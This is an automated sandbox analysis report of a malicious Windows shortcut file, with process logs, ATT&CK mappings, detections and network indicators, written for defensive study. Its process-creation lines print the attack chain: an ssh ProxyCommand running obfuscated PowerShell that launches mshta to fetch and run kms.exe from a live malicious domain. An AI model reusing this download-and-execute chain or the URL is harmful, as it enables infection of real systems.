Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5067Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4765Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1298Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 434Jump to behavior
Source: C:\Windows\System32\mshta.exeWindow / User API: threadDelayed 7268Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5708Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4100Thread sleep count: 5067 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4100Thread sleep count: 4765 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2576Thread sleep time: -13835058055282155s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7196Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7264Thread sleep count: 1298 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7268Thread sleep count: 434 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: svchost.exe, 00000003.00000002.2428854488.00000290F5C2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW'%
Source: mshta.exe, 00000005.00000002.2427858691.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1231820700.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWideogamesbookN
Source: svchost.exe, 00000003.00000002.2430278593.00000290FB250000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2430278593.00000290FB258000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1231820700.000001DE1E19D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2427858691.000001DE1E186000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1231706410.000001DE1E21F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2427858691.000001DE1E21F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: ssh.exe, 00000000.00000002.2427619666.000001E5C2719000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Encrypted powershell cmdline option found
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell (Convert-String -E '1 2 3 4 5 6=23 1//5/4/6' -I 'https: ms hta temp book.rollingvideogames.com kms.exe')
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell (Convert-String -E '1 2 3 4 5 6=23 1//5/4/6' -I 'https: ms hta temp book.rollingvideogames.com kms.exe')Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell (Convert-String -E '1 2 3 4 5 6=23 1//5/4/6' -I 'https: ms hta temp book.rollingvideogames.com kms.exe')Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "mshta https://book.rollingvideogames.com/temp/kms.exe"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://book.rollingvideogames.com/temp/kms.exeJump to behavior
Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh.exe "c:\windows\system32\openssh\ssh.exe" -o proxycommand="powershell powershell (convert-string -e '1 2 3 4 5 6=23 1//5/4/6' -i 'https: ms hta temp book.rollingvideogames.com kms.exe')" .
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter		1
DLL Side-Loading		11
Process Injection		11
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		31
Virtualization/Sandbox Evasion		LSASS Memory11
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials23
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1637536 Sample: test.lnk.download.lnk Startdate: 13/03/2025 Architecture: WINDOWS Score: 80 26 book.rollingvideogames.com 2->26 32 Antivirus detection for URL or domain 2->32 34 Windows shortcut file (LNK) starts blacklisted processes 2->34 36 Multi AV Scanner detection for submitted file 2->36 38 3 other signatures 2->38 9 ssh.exe 2 2->9         started        12 svchost.exe 1 1 2->12         started        signatures3 process4 dnsIp5 42 Windows shortcut file (LNK) starts blacklisted processes 9->42 44 Encrypted powershell cmdline option found 9->44 15 powershell.exe 15 9->15         started        18 conhost.exe 1 9->18         started        30 127.0.0.1 unknown unknown 12->30 signatures6 process7 signatures8 46 Windows shortcut file (LNK) starts blacklisted processes 15->46 20 powershell.exe 7 15->20         started        process9 signatures10 40 Windows shortcut file (LNK) starts blacklisted processes 20->40 23 mshta.exe 14 20->23         started        process11 dnsIp12 28 book.rollingvideogames.com 23.235.202.121, 443, 49718 INMOTI-1US United States 23->28

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
test.lnk.download.lnk29%ReversingLabsShortcut.Trojan.Generic
test.lnk.download.lnk37%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://book.rolling0%Avira URL Cloudsafe
https://book.rollingvideogames.com/temp/kms.exe)0%Avira URL Cloudsafe
https://book.rollingvideogames.com/temp/kms.exe6yZ0%Avira URL Cloudsafe
https://book.rollingvideogames.com/temp/kms.exep0%Avira URL Cloudsafe
https://book.rollingvideogames.com/temp/kms.exe$global:?0%Avira URL Cloudsafe
https://book.rolX0%Avira URL Cloudsafe
https://book.rollingvideogames.com/temp/kms.exei0%Avira URL Cloudsafe
https://book.rol0%Avira URL Cloudsafe
https://book.rollingvideogames.com/temp/kms.exe00%Avira URL Cloudsafe
https://book.rollingvideogames.com/temp/kms.exeb0%Avira URL Cloudsafe
https://book.rollingvideogames.com/temp/kms.exez0%Avira URL Cloudsafe
https://book.rollingvideogames.com/temp/kms.exe%0%Avira URL Cloudsafe
https://book.rollingvideogames.com/temp/kms.exeg0%Avira URL Cloudsafe
https://book.rollingvideogames.com/temp/kms.exe:0%Avira URL Cloudsafe
https://book.rollingvideogames.com/temp/kms.exeom0%Avira URL Cloudsafe
https://book.rollingvideogames.com/temp/kms.exeC:0%Avira URL Cloudsafe
https://book.rollingvideogames.com/temp/kms.exe~0%Avira URL Cloudsafe
https://book.rollingvideogames.com/temp/kms.exeu0%Avira URL Cloudsafe
https://book.rollingvideogames.com/temp/kms.exe50%Avira URL Cloudsafe
https://book.rollingvideogames.com/0%Avira URL Cloudsafe
https://book.rollingvideogames.com/temp/kms.exe100%Avira URL Cloudmalware
https://book.rollingvideogames.com/temp/kms.exeNetCookies0%Avira URL Cloudsafe
https://book.rollingvideogames.com/temp/kms.exeZ2tx0%Avira URL Cloudsafe
https://book.rollingvideogames.com/temp/kms.exeveY0%Avira URL Cloudsafe
https://book.rollingvideogames.com/l0%Avira URL Cloudsafe
https://book.rollingvideogames.com/temp/kms.exe...100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
book.rollingvideogames.com
23.235.202.121
truetrue
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://book.rollingvideogames.com/temp/kms.exetrue
    • Avira URL Cloud: malware
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://book.rolXpowershell.exe, 00000004.00000002.1211972513.0000022CC4538000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://book.rollingvideogames.com/temp/kms.exe)mshta.exe, 00000005.00000002.2427858691.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1231820700.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://book.rollingvideogames.com/temp/kms.exeipowershell.exe, 00000004.00000002.1210154215.0000022CC255E000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://book.rollingpowershell.exe, 00000004.00000002.1216172507.0000022CDC700000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    https://book.rollingvideogames.com/temp/kms.exe0powershell.exe, 00000004.00000002.1214726067.0000022CDC51B000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://book.rollingvideogames.com/temp/kms.exe6yZpowershell.exe, 00000004.00000002.1210154215.0000022CC25CA000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://book.rollingvideogames.com/temp/kms.exeppowershell.exe, 00000004.00000002.1211972513.0000022CC4091000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://book.rollingvideogames.com/temp/kms.exe$global:?powershell.exefalse
    • Avira URL Cloud: safe
    		unknown
    https://book.rollingvideogames.com/temp/kms.exebpowershell.exe, 00000004.00000002.1211027245.0000022CC26F0000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://book.rolpowershell.exe, 00000004.00000002.1211972513.0000022CC4538000.00000004.00000800.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    https://book.rollingvideogames.com/temp/kms.exe%mshta.exe, 00000005.00000002.2427858691.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1231820700.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://book.rollingvideogames.com/temp/kms.exegmshta.exe, 00000005.00000002.2429576557.000001E620CCB000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://book.rollingvideogames.com/temp/kms.exe:mshta.exe, 00000005.00000002.2427858691.000001DE1E169000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://book.rollingvideogames.com/temp/kms.exezmshta.exe, 00000005.00000002.2426648291.0000004EC9316000.00000004.00000010.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://crl.ver)svchost.exe, 00000003.00000002.2430316303.00000290FB28E000.00000004.00000020.00020000.00000000.sdmpfalse
      		high
      https://book.rollingvideogames.com/temp/kms.exeC:mshta.exe, 00000005.00000002.2427858691.000001DE1E160000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://g.live.com/odclientsettings/ProdV2.C:edb.log.3.drfalse
        		high
        https://book.rollingvideogames.com/temp/kms.exeommshta.exe, 00000005.00000002.2427858691.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1231820700.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://book.rollingvideogames.com/temp/kms.exe~mshta.exe, 00000005.00000002.2427858691.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1231820700.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://book.rollingvideogames.com/temp/kms.exe...mshta.exe, 00000005.00000002.2429576557.000001E620CCB000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://book.rollingvideogames.com/temp/kms.exe5mshta.exe, 00000005.00000002.2427858691.000001DE1E169000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://book.rollingvideogames.com/temp/kms.exeupowershell.exe, 00000004.00000002.1210154215.0000022CC2540000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://g.live.com/odclientsettings/Prod.C:edb.log.3.drfalse
          		high
          https://g.live.com/odclientsettings/ProdV2edb.log.3.drfalse
            		high
            https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000003.00000003.1203688722.00000290FB4C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.drfalse
              		high
              https://book.rollingvideogames.com/temp/kms.exeBpowershell.exe, 00000004.00000002.1211320823.0000022CC4080000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                https://book.rollingvideogames.com/mshta.exe, 00000005.00000002.2427858691.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1231820700.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://book.rollingvideogames.com/temp/kms.exeNetCookiesmshta.exe, 00000005.00000002.2427858691.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://book.rollingvideogames.com/lmshta.exe, 00000005.00000002.2427858691.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1231820700.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://book.rollingvideogames.com/temp/kms.exeZ2txmshta.exe, 00000005.00000003.1231820700.000001DE1E19D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2427858691.000001DE1E186000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://aka.ms/pscore68powershell.exe, 00000004.00000002.1211972513.0000022CC40D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1211972513.0000022CC40EC000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1211972513.0000022CC40EC000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://book.rollingvideogames.com/temp/kms.exeveYmshta.exe, 00000005.00000002.2427651275.000001DE1E140000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000003.00000003.1203688722.00000290FB4C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drfalse
                      		high

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      23.235.202.121
                      		book.rollingvideogames.comUnited States
                      		54641INMOTI-1UStrue

                      Private

                      IP
                      127.0.0.1

                      General Information

                      Joe Sandbox version:42.0.0 Malachite
                      Analysis ID:1637536
                      Start date and time:2025-03-13 17:31:27 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 4m 51s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:15
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:test.lnk.download.lnk
                      Detection:MAL
                      Classification:mal80.evad.winLNK@9/9@1/2
                      EGA Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 1
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Found application associated with file extension: .lnk

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 23.60.203.209, 4.175.87.197
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target powershell.exe, PID 7212 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      12:32:25API Interceptor29x Sleep call for process: powershell.exe modified
                      12:32:27API Interceptor2x Sleep call for process: svchost.exe modified

                      Joe Sandbox View / Context

                      IPs

                      No context

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      INMOTI-1UShttps://bznwz.com/o/?c3Y9bzM2NV8xX29uZSZyYW5kPU5tWnhibVk9JnVpZD1VU0VSMjgwMjIwMjVVMDMwMjI4MjY=N0123NGet hashmaliciousUnknownBrowse
                      • 199.250.197.52
                      https://jkaurelieodinsarlfrjkf.taplink.ws/Get hashmaliciousHTMLPhisherBrowse
                      • 199.250.197.52
                      https://jkaurelieodinsarlfrjkf.taplink.ws/Get hashmaliciousHTMLPhisherBrowse
                      • 199.250.197.52
                      77MmBkD2PE.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                      • 209.182.213.250
                      TtLlwb3ava.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                      • 209.182.213.250
                      yakov.arm7.elfGet hashmaliciousMiraiBrowse
                      • 70.39.239.245
                      27#U0646.batGet hashmaliciousAsyncRATBrowse
                      • 23.235.204.134
                      https://compucallinc.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                      • 69.174.52.100
                      https://compucallinc.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                      • 69.174.52.100
                      trow.exeGet hashmaliciousUnknownBrowse
                      • 70.39.251.249

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousRemcosBrowse
                      • 23.235.202.121
                      DropboxInstaller.exeGet hashmaliciousUnknownBrowse
                      • 23.235.202.121
                      faktura_FV2025020660849.htmlGet hashmaliciousUnknownBrowse
                      • 23.235.202.121
                      ngbtiladkrthgad.exeGet hashmaliciousVidarBrowse
                      • 23.235.202.121
                      Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeGet hashmaliciousGuLoader, RemcosBrowse
                      • 23.235.202.121
                      NDQ211216GM08.exe.bin.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                      • 23.235.202.121
                      PO-USH3gS.pdf.pif.exeGet hashmaliciousGuLoaderBrowse
                      • 23.235.202.121
                      IPt9U27NoX.exeGet hashmaliciousUnknownBrowse
                      • 23.235.202.121
                      IPt9U27NoX.exeGet hashmaliciousUnknownBrowse
                      • 23.235.202.121
                      justificante de transferencia09454545.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                      • 23.235.202.121

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\ProgramData\Microsoft\Network\Downloader\edb.log

                      Download File
                      Process:C:\Windows\System32\svchost.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):1310720
                      Entropy (8bit):1.307371993025875
                      Encrypted:false
